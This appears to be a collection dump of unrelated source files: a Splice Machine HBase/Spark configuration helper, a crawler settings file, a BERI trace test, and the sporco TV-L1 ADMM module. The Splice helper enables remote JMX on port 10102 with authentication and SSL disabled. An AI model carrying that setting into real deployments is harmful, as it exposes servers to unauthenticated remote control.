"hbase.ipc.warn.response.time" : "-1",
"hbase.master.loadbalance.bytable" : "true",
"hbase.master.balancer.stochastic.regionCountCost" : "1500",
"hbase.regions.slop" : "0",
"hbase.regionserver.global.memstore.size.lower.limit" : "0.9",
"hbase.client.scanner.timeout.period" : "1200000",
"hbase.regionserver.maxlogs" : "48",
"hbase.regionserver.thread.compaction.large" : "1",
"hbase.regionserver.thread.compaction.small" : "4",
"hbase.regionserver.wal.enablecompression" : "true",
"hbase.rowlock.wait.duration" : "10",
"hbase.splitlog.manager.timeout" : "3000",
"hbase.status.multicast.port" : "16100",
"hbase.wal.disruptor.batch" : "true",
"hbase.wal.provider" : "multiwal",
"hbase.wal.regiongrouping.numgroups" : "16",
"hbase.zookeeper.property.tickTime" : "6000",
"hbase.mirror.table.state.to.zookeeper" : "FALSE",
"hbase.migrate.table.state.from.zookeeper": "FALSE",
"hfile.block.bloom.cacheonwrite" : "TRUE",
"io.storefile.bloom.error.rate" : "0.005",
"splice.authentication.native.algorithm" : "SHA-512",
"splice.authentication" : "NATIVE",
"splice.client.numConnections" : "1",
"splice.client.write.maxDependentWrites" : "60000",
"splice.client.write.maxIndependentWrites" : "60000",
"splice.compression" : "snappy",
"splice.marshal.kryoPoolSize" : "1100",
"splice.olap_server.clientWaitTime" : "900000",
"splice.ring.bufferSize" : "131072",
"splice.splitBlockSize" : "67108864",
"splice.timestamp_server.clientWaitTime" : "120000",
"splice.txn.activeTxns.cacheSize" : "10240",
"splice.txn.completedTxns.concurrency" : "128",
"splice.txn.concurrencyLevel" : "4096",
"splice.olap_server.memory" : "8192",
"splice.olap_server.memoryOverhead" : "2048",
"splice.olap_server.virtualCores" : "2",
"splice.authorization.scheme" : "NATIVE",
"hbase.replication.source.service" : "com.splicemachine.replication.SpliceReplication",
"hbase.replication.sink.service" : "com.splicemachine.replication.SpliceReplication",
"hbase.bucketcache.ioengine" : "",
"hbase.regionserver.replication.handler.count":"40"
}
return hbase_site_desired_values
def getMasterDashDProperties(self):
dashDProperties = [
"splice.spark.enabled=true",
"splice.spark.app.name=SpliceMachine",
"splice.spark.master=yarn",
"splice.spark.submit.deployMode=client",
"splice.spark.logConf=true",
"splice.spark.yarn.maxAppAttempts=1",
"splice.spark.driver.maxResultSize=1g",
"splice.spark.driver.cores=2",
"splice.spark.yarn.am.memory=1g",
"splice.spark.dynamicAllocation.enabled=true",
"splice.spark.dynamicAllocation.executorIdleTimeout=120",
"splice.spark.dynamicAllocation.cachedExecutorIdleTimeout=120",
"splice.spark.dynamicAllocation.minExecutors=0",
"splice.spark.kryo.referenceTracking=false",
"splice.spark.kryo.registrator=com.splicemachine.derby.impl.SpliceSparkKryoRegistrator",
"splice.spark.kryoserializer.buffer.max=512m",
"splice.spark.kryoserializer.buffer=4m",
"splice.spark.locality.wait=100",
"splice.spark.memory.fraction=0.5",
"splice.spark.scheduler.mode=FAIR",
"splice.spark.serializer=org.apache.spark.serializer.KryoSerializer",
"splice.spark.shuffle.compress=false",
"splice.spark.shuffle.file.buffer=128k",
"splice.spark.shuffle.service.enabled=true",
"splice.spark.reducer.maxReqSizeShuffleToMem=134217728",
"splice.spark.yarn.am.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.yarn.am.waitTime=10s",
"splice.spark.yarn.executor.memoryOverhead=2048",
"splice.spark.yarn.am.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.driver.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.driver.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.driver.extraClassPath=/usr/hdp/current/hbase-regionserver/conf:/usr/hdp/current/hbase-regionserver/lib/htrace-core-3.1.0-incubating.jar",
"splice.spark.ui.retainedJobs=100",
"splice.spark.ui.retainedStages=100",
"splice.spark.worker.ui.retainedExecutors=100",
"splice.spark.worker.ui.retainedDrivers=100",
"splice.spark.streaming.ui.retainedBatches=100",
"splice.spark.executor.cores=4",
"splice.spark.executor.memory=8g",
"spark.compaction.reserved.slots=4",
"splice.spark.eventLog.enabled=true",
"splice.spark.eventLog.dir=hdfs:///user/splice/history",
"splice.spark.local.dir=/tmp",
"splice.spark.executor.userClassPathFirst=true",
"splice.spark.driver.userClassPathFirst=true",
"splice.spark.executor.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.executor.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.executor.extraClassPath=/usr/hdp/current/hbase-regionserver/conf:/usr/hdp/current/hbase-regionserver/lib/htrace-core-3.1.0-incubating.jar:/var/lib/splicemachine/*:/usr/hdp/3.1.0.0-78/spark2/jars/*:/usr/hdp/current/hbase-master/lib/*:/usr/hdp/3.1.0.0-78/hbase/lib/atlas-hbase-plugin-impl/kafka*",
"splice.spark.yarn.jars=/usr/hdp/3.1.0.0-78/spark2/jars/*"
]
return dashDProperties
def getRegionServerDashDProperties(self):
dashDProperties = [
"com.sun.management.jmxremote.authenticate=false",
"com.sun.management.jmxremote.ssl=false",
"com.sun.management.jmxremote.port=10102"
]
return dashDProperties
| agpl-3.0 | -3,605,641,735,364,624,400 | 53.634304 | 466 | 0.701635 | false |
seraphlnWu/creditor | configurations/mainnode.py | 1 | 1032 | # coding=utf8
from os.path import join
main_node_host = 'localhost'
main_node_port = 5036
controller_port = 5036
controller_timeout = 10
main_node_manhole_port = 8791
app_root = '/home/wubin/observer'
client_register_timeout = 10
client_request_timeout = 1000 # seconds
request_max_attempts = 1
request_attempt_interval = 1000 # seconds
versions = {
'observer.creditor.active_spider': ((1, 0), (1, 0)),
}
mongo_host = 'localhost'
mongo_port = 27017
mongo_dbname = 'sandbox_keywords'
collection_name = 'accounts'
db_keywords_collection = 'keywords'
client_manhole_port = 8788
min_priority = 1
max_priority = 10
keyword_freq_file = 'keywords_freq_file'
feed_id_file = 'feed_id_file'
keyword_file = ''
db_uids_host = 'localhost'
db_uids_port = 27017
db_uids_dbname = 'sandbox_keywords'
db_uids_collection = 'uids'
db_backtracking_collection = 'backtracking_keywords'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
kafka_host = 'localhost'
kafka_port = 9092
kafka_topic = "store_topic"
controller_timeout = 15
| apache-2.0 | 5,372,193,645,929,906,000 | 18.471698 | 56 | 0.716085 | false |
8l/beri | cheritest/trunk/tests/trace/test_raw_trace.py | 2 | 2042 | #-
# Copyright (c) 2013 Colin Rothwell
# All rights reserved.
#
# This software was developed by Colin Rothwell as part of his summer
# internship.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
import sys
from beritest_tools import BaseBERITestCase
def read_trace_records(trace_file_name, record_count, record_width=32):
with open(trace_file_name, 'rb') as trace_file:
return trace_file.read(record_count * record_width)
class test_raw_trace(BaseBERITestCase):
def test_uncached(self):
'''Test trace from uncached memory is as expected'''
actual = read_trace_records('log/test_raw_trace.trace', 5)
expected = read_trace_records('tests/trace/uncached_expected.trace', 5)
self.assertEqual(actual, expected, 'Uncached trace mismatch. Use the '
'readtrace program to debug.')
def test_cached(self):
'''Test trace from cached memory is as expected'''
actual = read_trace_records('log/test_raw_trace_cached.trace', 7)
expected = read_trace_records('tests/trace/cached_expected.trace', 7)
self.assertEqual(actual, expected, 'Cached trace mismatch. Use the '
'readtrace program to debug.')
| apache-2.0 | 5,793,459,442,878,046,000 | 41.541667 | 79 | 0.711557 | false |
bwohlberg/sporco | sporco/admm/tvl1.py | 1 | 24507 | # -*- coding: utf-8 -*-
# Copyright (C) 2015-2020 by Brendt Wohlberg <[email protected]>
# All rights reserved. BSD 3-clause License.
# This file is part of the SPORCO package. Details of the copyright
# and user license can be found in the 'LICENSE.txt' file distributed
# with the package.
r"""Classes for ADMM algorithms for Total Variation (TV) optimisation
with an :math:`\ell_1` data fidelity term"""
from __future__ import division, absolute_import
import copy
import numpy as np
from sporco.admm import admm
from sporco.array import zpad, atleast_nd, zdivide
from sporco.fft import real_dtype, fftn_func, ifftn_func
from sporco.signal import gradient_filters, grad, gradT
from sporco.linalg import rrs
from sporco.prox import prox_l1, prox_l2
__author__ = """Brendt Wohlberg <[email protected]>"""
class TVL1Denoise(admm.ADMM):
r"""ADMM algorithm for :math:`\ell_1`-TV denoising problem
:cite:`alliney-1992-digital` :cite:`esser-2010-primal` (Sec. 2.4.4).
Solve the optimisation problem
.. math::
\mathrm{argmin}_\mathbf{x} \;
\| W_{\mathrm{df}} (\mathbf{x} - \mathbf{s}) \|_1 +
\lambda \left\| W_{\mathrm{tv}} \sqrt{(G_r \mathbf{x})^2 +
(G_c \mathbf{x})^2} \right\|_1
via the ADMM problem
.. math::
\mathrm{argmin}_{\mathbf{x},\mathbf{y}_d,\mathbf{y}_r,\mathbf{y}_c} \;
(1/2) \| W_{\mathrm{df}} \mathbf{y}_d \|_1 +
\lambda \left\| W_{\mathrm{tv}} \sqrt{(\mathbf{y}_r)^2 +
(\mathbf{y}_c)^2} \right\|_1 \;\text{such that}\;
\left( \begin{array}{c} G_r \\ G_c \\ I \end{array} \right)
\mathbf{x} - \left( \begin{array}{c} \mathbf{y}_r \\
\mathbf{y}_c \\ \mathbf{y}_d \end{array}
\right) = \left( \begin{array}{c} \mathbf{0} \\ \mathbf{0} \\
\mathbf{s} \end{array} \right) \;\;,
where :math:`G_r` and :math:`G_c` are gradient operators along array
rows and columns respectively, and :math:`W_{\mathrm{df}}` and
:math:`W_{\mathrm{tv}}` are diagonal weighting matrices.
While these equations describe the default behaviour of regularisation
in two dimensions, this class supports an arbitrary number of
dimensions. For example, for 3D TV regularisation in a 3D array,
the object should be initialised with parameter `axes` set to
`(0, 1, 2)`.
After termination of the :meth:`solve` method, attribute :attr:`itstat`
is a list of tuples representing statistics of each iteration. The
fields of the named tuple ``IterationStats`` are:
``Iter`` : Iteration number
``ObjFun`` : Objective function value
``DFid`` : Value of data fidelity term :math:`\|
W_{\mathrm{df}} (\mathbf{x} - \mathbf{s}) \|_1`
``RegTV`` : Value of regularisation term :math:`\|
W_{\mathrm{tv}} \sqrt{(G_r \mathbf{x})^2 + (G_c \mathbf{x})^2}
\|_1`
``PrimalRsdl`` : Norm of primal residual
``DualRsdl`` : Norm of dual residual
``EpsPrimal`` : Primal residual stopping tolerance
:math:`\epsilon_{\mathrm{pri}}`
``EpsDual`` : Dual residual stopping tolerance
:math:`\epsilon_{\mathrm{dua}}`
``Rho`` : Penalty parameter
``GSIter`` : Number of Gauss-Seidel iterations
``GSRelRes`` : Relative residual of Gauss-Seidel solution
``Time`` : Cumulative run time
"""
class Options(admm.ADMM.Options):
"""TVL1Denoise algorithm options
Options include all of those defined in
:class:`sporco.admm.admm.ADMM.Options`, together with
additional options:
``gEvalY`` : Flag indicating whether the :math:`g` component
of the objective function should be evaluated using variable
Y (``True``) or X (``False``) as its argument.
``MaxGSIter`` : Maximum Gauss-Seidel iterations.
``GSTol`` : Gauss-Seidel stopping tolerance.
``DFidWeight`` : Data fidelity weight matrix.
``TVWeight`` : TV term weight matrix.
"""
defaults = copy.deepcopy(admm.ADMM.Options.defaults)
defaults.update({'gEvalY': True, 'RelaxParam': 1.8,
'DFidWeight': 1.0, 'TVWeight': 1.0,
'GSTol': 0.0, 'MaxGSIter': 2
})
defaults['AutoRho'].update({'Enabled': False, 'Period': 1,
'AutoScaling': True, 'Scaling': 1000.0,
'RsdlRatio': 1.2})
def __init__(self, opt=None):
"""
Parameters
----------
opt : dict or None, optional (default None)
TVL1Denoise algorithm options
"""
if opt is None:
opt = {}
admm.ADMM.Options.__init__(self, opt)
if self['AutoRho', 'RsdlTarget'] is None:
self['AutoRho', 'RsdlTarget'] = 1.0
itstat_fields_objfn = ('ObjFun', 'DFid', 'RegTV')
itstat_fields_extra = ('GSIter', 'GSRelRes')
hdrtxt_objfn = ('Fnc', 'DFid', 'RegTV')
hdrval_objfun = {'Fnc': 'ObjFun', 'DFid': 'DFid', 'RegTV': 'RegTV'}
def __init__(self, S, lmbda, opt=None, axes=(0, 1), caxis=None):
"""
|
**Call graph**
.. image:: ../_static/jonga/tvl1den_init.svg
:width: 20%
:target: ../_static/jonga/tvl1den_init.svg
|
Parameters
----------
S : array_like
Signal vector or matrix
lmbda : float
Regularisation parameter
opt : TVL1Denoise.Options object
Algorithm options
axes : tuple, optional (default (0, 1))
Axes on which TV regularisation is to be applied
caxis : int or None, optional (default None)
Axis on which channels of a multi-channel image are stacked.
If None, TV regularisation is applied indepdendently to each
channel, otherwise Vector TV :cite:`blomgren-1998-color`
regularisation is applied jointly to all channels.
"""
if opt is None:
opt = TVL1Denoise.Options()
# Set flag indicating whether problem involves real or complex
# values
self.real_dtype = np.isrealobj(S)
# Set dtype attribute based on S.dtype and opt['DataType']
self.set_dtype(opt, S.dtype)
self.S = np.asarray(S, dtype=self.dtype)
self.axes = axes
if caxis is None:
self.saxes = (-1,)
else:
self.saxes = (caxis, -1)
self.lmbda = real_dtype(self.dtype).type(lmbda)
# Set penalty parameter
self.set_attr('rho', opt['rho'], dval=(2.0*self.lmbda + 0.1),
dtype=real_dtype(self.dtype))
yshape = S.shape + (len(axes)+1,)
super(TVL1Denoise, self).__init__(S.size, yshape, yshape, S.dtype, opt)
self.Wdf = np.asarray(self.opt['DFidWeight'],
dtype=real_dtype(self.dtype))
self.lcw = self.LaplaceCentreWeight()
self.Wtv = np.asarray(self.opt['TVWeight'],
dtype=real_dtype(self.dtype))
if hasattr(self.Wtv, 'ndim') and self.Wtv.ndim == S.ndim:
self.Wtvna = self.Wtv[..., np.newaxis]
else:
self.Wtvna = self.Wtv
# Need to initialise X because of Gauss-Seidel in xstep
self.X = self.S
def uinit(self, ushape):
"""Return initialiser for working variable U."""
if self.opt['Y0'] is None:
return np.zeros(ushape, dtype=self.dtype)
else:
# If initial Y is non-zero, initial U is chosen so that
# the relevant dual optimality criterion (see (3.10) in
# boyd-2010-distributed) is satisfied.
Yss = np.sqrt(np.sum(self.Y[..., 0:-1]**2, axis=self.S.ndim,
keepdims=True))
U0 = (self.lmbda/self.rho)*zdivide(self.Y[..., 0:-1], Yss)
U1 = (1.0 / self.rho)*np.sign(self.Y[..., -1:])
return np.concatenate((U0, U1), axis=self.S.ndim)
def xstep(self):
r"""Minimise Augmented Lagrangian with respect to
:math:`\mathbf{x}`.
"""
ngsit = 0
gsrrs = np.inf
YU = self.Y - self.U
SYU = self.S + YU[..., -1]
YU[..., -1] = 0.0
ATYU = self.cnst_AT(YU)
while gsrrs > self.opt['GSTol'] and ngsit < self.opt['MaxGSIter']:
self.X = self.GaussSeidelStep(
SYU, self.X, ATYU, 1.0, self.lcw, 1.0)
gsrrs = rrs(
self.cnst_AT(self.cnst_A(self.X)),
self.cnst_AT(self.cnst_c() - self.cnst_B(self.Y) - self.U)
)
ngsit += 1
self.xs = (ngsit, gsrrs)
def ystep(self):
r"""Minimise Augmented Lagrangian with respect to
:math:`\mathbf{y}`.
"""
self.Y[..., 0:-1] = prox_l2(
self.AX[..., 0:-1] + self.U[..., 0:-1],
(self.lmbda/self.rho)*self.Wtvna, axis=self.saxes)
self.Y[..., -1] = prox_l1(
self.AX[..., -1] + self.U[..., -1] - self.S,
(1.0/self.rho)*self.Wdf)
def obfn_gvar(self):
"""Variable to be evaluated in computing regularisation term,
depending on 'gEvalY' option value.
"""
if self.opt['gEvalY']:
return self.Y
else:
return self.cnst_A(self.X) - self.cnst_c()
def eval_objfn(self):
r"""Compute components of objective function as well as total
contribution to objective function. Data fidelity term is
:math:`(1/2) \| \mathbf{x} - \mathbf{s} \|_2^2` and
regularisation term is :math:`\| W_{\mathrm{tv}}
\sqrt{(G_r \mathbf{x})^2 + (G_c \mathbf{x})^2}\|_1`.
"""
if self.real_dtype:
gvr = self.obfn_gvar()
else:
gvr = np.abs(self.obfn_gvar())
dfd = np.sum(np.abs(self.Wdf * gvr[..., -1]))
reg = np.sum(self.Wtv * np.sqrt(np.sum(gvr[..., 0:-1]**2,
axis=self.saxes)))
obj = dfd + self.lmbda*reg
return (obj, dfd, reg)
def itstat_extra(self):
"""Non-standard entries for the iteration stats record tuple."""
return (self.xs[0], self.xs[1])
def cnst_A(self, X):
r"""Compute :math:`A \mathbf{x}` component of ADMM problem
constraint. In this case :math:`A \mathbf{x} = (G_r^T \;\; G_c^T
\;\; I)^T \mathbf{x}`.
"""
return np.concatenate(
[grad(X, ax)[..., np.newaxis] for ax in self.axes] +
[X[..., np.newaxis],], axis=X.ndim)
def cnst_AT(self, X):
r"""Compute :math:`A^T \mathbf{x}` where :math:`A \mathbf{x}` is
a component of ADMM problem constraint. In this case
:math:`A^T \mathbf{x} = (G_r^T \;\; G_c^T \;\; I) \mathbf{x}`.
"""
return np.sum(np.concatenate(
[gradT(X[..., ax], ax)[..., np.newaxis] for ax in self.axes] +
[X[..., -1:],], axis=X.ndim-1), axis=X.ndim-1)
def cnst_B(self, Y):
r"""Compute :math:`B \mathbf{y}` component of ADMM problem
constraint. In this case :math:`B \mathbf{y} = -\mathbf{y}`.
"""
return -Y
def cnst_c(self):
r"""Compute constant component :math:`\mathbf{c}` of ADMM problem
constraint. In this case :math:`\mathbf{c} = (\mathbf{0} \;\;
\mathbf{0} \;\; \mathbf{s})`.
"""
c = np.zeros(self.S.shape + (len(self.axes)+1,), self.dtype)
c[..., -1] = self.S
return c
def rsdl_s(self, Yprev, Y):
"""Compute dual residual vector."""
return self.rho*np.linalg.norm(self.cnst_AT(self.U))
def rsdl_sn(self, U):
"""Compute dual residual normalisation term."""
return self.rho*np.linalg.norm(U)
def LaplaceCentreWeight(self):
"""Centre weighting matrix for TV Laplacian."""
sz = [1,] * self.S.ndim
for ax in self.axes:
sz[ax] = self.S.shape[ax]
lcw = 2*len(self.axes)*np.ones(sz, dtype=self.dtype)
for ax in self.axes:
lcw[(slice(None),)*ax + ([0, -1],)] -= 1.0
return lcw
def GaussSeidelStep(self, S, X, ATYU, rho, lcw, W2):
"""Gauss-Seidel step for linear system in TV problem."""
Xss = np.zeros_like(S, dtype=self.dtype)
for ax in self.axes:
Xss += zpad(X[(slice(None),)*ax + (slice(0, -1),)], (1, 0), ax)
Xss += zpad(X[(slice(None),)*ax + (slice(1, None),)],
(0, 1), ax)
return (rho*(Xss + ATYU) + W2*S) / (W2 + rho*lcw)
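# Illustrative usage sketch (not part of the original module): denoise a small
# synthetic image with the l1-TV denoiser defined above. The image, lmbda value,
# and iteration count are arbitrary choices made for demonstration; the option
# names are the standard ones inherited from admm.ADMM.Options.
def _tvl1denoise_example():
    s = np.random.randn(16, 16).astype(np.float32)
    opt = TVL1Denoise.Options({'Verbose': False, 'MaxMainIter': 20})
    return TVL1Denoise(s, 0.5, opt=opt).solve()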
class TVL1Deconv(admm.ADMM):
r"""ADMM algorithm for :math:`\ell_1`-TV deconvolution problem.
Solve the optimisation problem
.. math::
\mathrm{argmin}_\mathbf{x} \;
\| W_{\mathrm{df}} (H \mathbf{x} - \mathbf{s}) \|_1 +
\lambda \left\| W_{\mathrm{tv}} \sqrt{(G_r \mathbf{x})^2 +
(G_c \mathbf{x})^2} \right\|_1 \;\;,
where :math:`H` denotes the linear operator corresponding to a
convolution, :math:`G_r` and :math:`G_c` are gradient operators
along array rows and columns respectively, and
:math:`W_{\mathrm{df}}` and :math:`W_{\mathrm{tv}}` are diagonal
weighting matrices, via the ADMM problem
.. math::
\mathrm{argmin}_{\mathbf{x},\mathbf{y}_d,\mathbf{y}_r,\mathbf{y}_c} \;
(1/2) \| W_{\mathrm{df}} \mathbf{y}_d \|_1 +
\lambda \left\| W_{\mathrm{tv}} \sqrt{(\mathbf{y}_r)^2 +
(\mathbf{y}_c)^2} \right\|_1 \;\text{such that}\;
\left( \begin{array}{c} G_r \\ G_c \\ H \end{array} \right)
\mathbf{x} - \left( \begin{array}{c} \mathbf{y}_r \\
\mathbf{y}_c \\ \mathbf{y}_d \end{array}
\right) = \left( \begin{array}{c} \mathbf{0} \\ \mathbf{0} \\
\mathbf{s} \end{array} \right) \;\;.
While these equations describe the default behaviour of regularisation
in two dimensions, this class supports an arbitrary number of
dimensions. For example, for 3D TV regularisation in a 3D array,
the object should be initialised with parameter `axes` set to
`(0, 1, 2)`.
Note that the convolution is implemented in the frequency domain,
having the same phase offset as :func:`.fftconv`, which differs from
that of :func:`scipy.ndimage.convolve` with the default ``origin``
parameter.
After termination of the :meth:`solve` method, attribute :attr:`itstat`
is a list of tuples representing statistics of each iteration. The
fields of the named tuple ``IterationStats`` are:
``Iter`` : Iteration number
``ObjFun`` : Objective function value
``DFid`` : Value of data fidelity term :math:`\|
W_{\mathrm{df}} (H \mathbf{x} - \mathbf{s}) \|_1`
``RegTV`` : Value of regularisation term :math:`\|
W_{\mathrm{tv}} \sqrt{(G_r \mathbf{x})^2 + (G_c \mathbf{x})^2}
\|_1`
``PrimalRsdl`` : Norm of primal residual
``DualRsdl`` : Norm of dual residual
``EpsPrimal`` : Primal residual stopping tolerance
:math:`\epsilon_{\mathrm{pri}}`
``EpsDual`` : Dual residual stopping tolerance
:math:`\epsilon_{\mathrm{dua}}`
``Rho`` : Penalty parameter
``XSlvRelRes`` : Relative residual of X step solver
``Time`` : Cumulative run time
"""
class Options(admm.ADMM.Options):
"""TVL1Deconv algorithm options
Options include all of those defined in
:class:`sporco.admm.admm.ADMM.Options`, together with
additional options:
``gEvalY`` : Flag indicating whether the :math:`g` component
of the objective function should be evaluated using variable
Y (``True``) or X (``False``) as its argument.
``LinSolveCheck`` : If ``True``, compute relative residual of
X step solver.
``DFidWeight`` : Data fidelity weight matrix.
``TVWeight`` : TV term weight matrix.
"""
defaults = copy.deepcopy(admm.ADMM.Options.defaults)
defaults.update(
{'gEvalY': True, 'RelaxParam': 1.8, 'LinSolveCheck': False,
'DFidWeight': 1.0, 'TVWeight': 1.0})
defaults['AutoRho'].update(
{'Enabled': False, 'Period': 1, 'AutoScaling': True,
'Scaling': 1000.0, 'RsdlRatio': 1.2})
def __init__(self, opt=None):
"""
Parameters
----------
opt : dict or None, optional (default None)
TVL1Deconv algorithm options
"""
if opt is None:
opt = {}
admm.ADMM.Options.__init__(self, opt)
if self['AutoRho', 'RsdlTarget'] is None:
self['AutoRho', 'RsdlTarget'] = 1.0
itstat_fields_objfn = ('ObjFun', 'DFid', 'RegTV')
itstat_fields_extra = ('XSlvRelRes',)
hdrtxt_objfn = ('Fnc', 'DFid', 'RegTV')
hdrval_objfun = {'Fnc': 'ObjFun', 'DFid': 'DFid', 'RegTV': 'RegTV'}
def __init__(self, A, S, lmbda, opt=None, axes=(0, 1), caxis=None):
"""
|
**Call graph**
.. image:: ../_static/jonga/tvl1dcn_init.svg
:width: 20%
:target: ../_static/jonga/tvl1dcn_init.svg
|
Parameters
----------
A : array_like
Filter kernel corresponding to operator :math:`H` above
S : array_like
Signal vector or matrix
lmbda : float
Regularisation parameter
opt : TVL1Deconv.Options object
Algorithm options
axes : tuple, optional (default (0, 1))
Axes on which TV regularisation is to be applied
caxis : int or None, optional (default None)
Axis on which channels of a multi-channel image are stacked.
If None, TV regularisation is applied indepdendently to each
channel, otherwise Vector TV :cite:`blomgren-1998-color`
regularisation is applied jointly to all channels.
"""
if opt is None:
opt = TVL1Deconv.Options()
# Set flag indicating whether problem involves real or complex
# values, and get appropriate versions of functions from fft
# module
self.real_dtype = np.isrealobj(S)
self.fftn = fftn_func(self.real_dtype)
self.ifftn = ifftn_func(self.real_dtype)
# Set dtype attribute based on S.dtype and opt['DataType']
self.set_dtype(opt, S.dtype)
self.axes = axes
self.axsz = tuple([S.shape[i] for i in axes])
if caxis is None:
self.saxes = (-1,)
else:
self.saxes = (caxis, -1)
self.lmbda = real_dtype(self.dtype).type(lmbda)
# Set penalty parameter
self.set_attr('rho', opt['rho'], dval=(2.0*self.lmbda + 0.1),
dtype=real_dtype(self.dtype))
yshape = S.shape + (len(axes)+1,)
self.S = np.asarray(S, dtype=self.dtype)
super(TVL1Deconv, self).__init__(S.size, yshape, yshape, S.dtype, opt)
self.axshp = tuple([S.shape[k] for k in axes])
self.A = atleast_nd(S.ndim, A.astype(self.dtype))
self.Af = self.fftn(self.A, self.axshp, axes=axes)
self.Sf = self.fftn(self.S, axes=axes)
self.AHAf = np.conj(self.Af)*self.Af
self.AHSf = np.conj(self.Af)*self.Sf
self.Wdf = np.asarray(self.opt['DFidWeight'],
dtype=real_dtype(self.dtype))
self.Wtv = np.asarray(self.opt['TVWeight'],
dtype=real_dtype(self.dtype))
if hasattr(self.Wtv, 'ndim') and self.Wtv.ndim == S.ndim:
self.Wtvna = self.Wtv[..., np.newaxis]
else:
self.Wtvna = self.Wtv
self.Gf, self.GHGf = gradient_filters(S.ndim, axes, self.axshp,
dtype=self.dtype)
self.GAf = np.concatenate((self.Gf, self.Af[..., np.newaxis]),
axis=self.Gf.ndim-1)
def uinit(self, ushape):
"""Return initialiser for working variable U."""
if self.opt['Y0'] is None:
return np.zeros(ushape, dtype=self.dtype)
else:
# If initial Y is non-zero, initial U is chosen so that
# the relevant dual optimality criterion (see (3.10) in
# boyd-2010-distributed) is satisfied.
Yss = np.sqrt(np.sum(self.Y[..., 0:-1]**2, axis=self.S.ndim,
keepdims=True))
U0 = (self.lmbda/self.rho)*zdivide(self.Y[..., 0:-1], Yss)
U1 = (1.0 / self.rho)*np.sign(self.Y[..., -1:])
return np.concatenate((U0, U1), axis=self.S.ndim)
def xstep(self):
r"""Minimise Augmented Lagrangian with respect to
:math:`\mathbf{x}`.
"""
b = self.AHSf + np.sum(
np.conj(self.GAf) * self.fftn(self.Y-self.U, axes=self.axes),
axis=self.Y.ndim-1)
self.Xf = b / (self.AHAf + self.GHGf)
self.X = self.ifftn(self.Xf, self.axsz, axes=self.axes)
if self.opt['LinSolveCheck']:
ax = (self.AHAf + self.GHGf)*self.Xf
self.xrrs = rrs(ax, b)
else:
self.xrrs = None
def ystep(self):
r"""Minimise Augmented Lagrangian with respect to
:math:`\mathbf{y}`.
"""
self.Y[..., 0:-1] = prox_l2(
self.AX[..., 0:-1] + self.U[..., 0:-1],
(self.lmbda/self.rho)*self.Wtvna, axis=self.saxes)
self.Y[..., -1] = prox_l1(
self.AX[..., -1] + self.U[..., -1] - self.S,
(1.0/self.rho)*self.Wdf)
def obfn_gvar(self):
"""Variable to be evaluated in computing regularisation term,
depending on 'gEvalY' option value.
"""
if self.opt['gEvalY']:
return self.Y
else:
return self.cnst_A(None, self.Xf) - self.cnst_c()
def eval_objfn(self):
r"""Compute components of objective function as well as total
contribution to objective function. Data fidelity term is
:math:`\| W_{\mathrm{df}} (H \mathbf{x} - \mathbf{s}) \|_1` and
regularisation term is :math:`\| W_{\mathrm{tv}}
\sqrt{(G_r \mathbf{x})^2 + (G_c \mathbf{x})^2}\|_1`.
"""
if self.real_dtype:
gvr = self.obfn_gvar()
else:
gvr = np.abs(self.obfn_gvar())
dfd = np.sum(self.Wdf * np.abs(gvr[..., -1]))
reg = np.sum(self.Wtv * np.sqrt(np.sum(gvr[..., 0:-1]**2,
axis=self.saxes)))
obj = dfd + self.lmbda*reg
return (obj, dfd, reg)
def itstat_extra(self):
"""Non-standard entries for the iteration stats record tuple."""
return (self.xrrs,)
def cnst_A(self, X, Xf=None):
r"""Compute :math:`A \mathbf{x}` component of ADMM problem
constraint. In this case :math:`A \mathbf{x} = (G_r^T \;\;
G_c^T \;\; H)^T \mathbf{x}`.
"""
if Xf is None:
Xf = self.fftn(X, axes=self.axes)
return self.ifftn(self.GAf*Xf[..., np.newaxis], self.axsz,
axes=self.axes)
def cnst_AT(self, X):
r"""Compute :math:`A^T \mathbf{x}` where :math:`A \mathbf{x}` is
a component of ADMM problem constraint. In this case
:math:`A^T \mathbf{x} = (G_r^T \;\; G_c^T \;\; H^T) \mathbf{x}`.
"""
Xf = self.fftn(X, axes=self.axes)
return np.sum(self.ifftn(np.conj(self.GAf)*Xf, self.axsz,
axes=self.axes), axis=self.Y.ndim-1)
def cnst_B(self, Y):
r"""Compute :math:`B \mathbf{y}` component of ADMM problem
constraint. In this case :math:`B \mathbf{y} = -\mathbf{y}`.
"""
return -Y
def cnst_c(self):
r"""Compute constant component :math:`\mathbf{c}` of ADMM problem
constraint. In this case :math:`\mathbf{c} = (\mathbf{0} \;\;
\mathbf{0} \;\; \mathbf{s})`.
"""
c = np.zeros(self.S.shape + (len(self.axes)+1,), self.dtype)
c[..., -1] = self.S
return c
def rsdl_s(self, Yprev, Y):
"""Compute dual residual vector."""
return self.rho*np.linalg.norm(self.cnst_AT(self.U))
def rsdl_sn(self, U):
"""Compute dual residual normalisation term."""
return self.rho*np.linalg.norm(U)
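# Illustrative usage sketch (not part of the original module): deconvolve a small
# synthetic image with the l1-TV deconvolution class above. The kernel, image, and
# lmbda value are arbitrary choices made for demonstration only.
def _tvl1deconv_example():
    psf = np.ones((3, 3), dtype=np.float32) / 9.0
    s = np.random.randn(16, 16).astype(np.float32)
    opt = TVL1Deconv.Options({'Verbose': False, 'MaxMainIter': 20})
    return TVL1Deconv(psf, s, 0.5, opt=opt).solve()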
| bsd-3-clause | 4,074,499,690,839,444,500 | 31.373844 | 79 | 0.541478 | false |
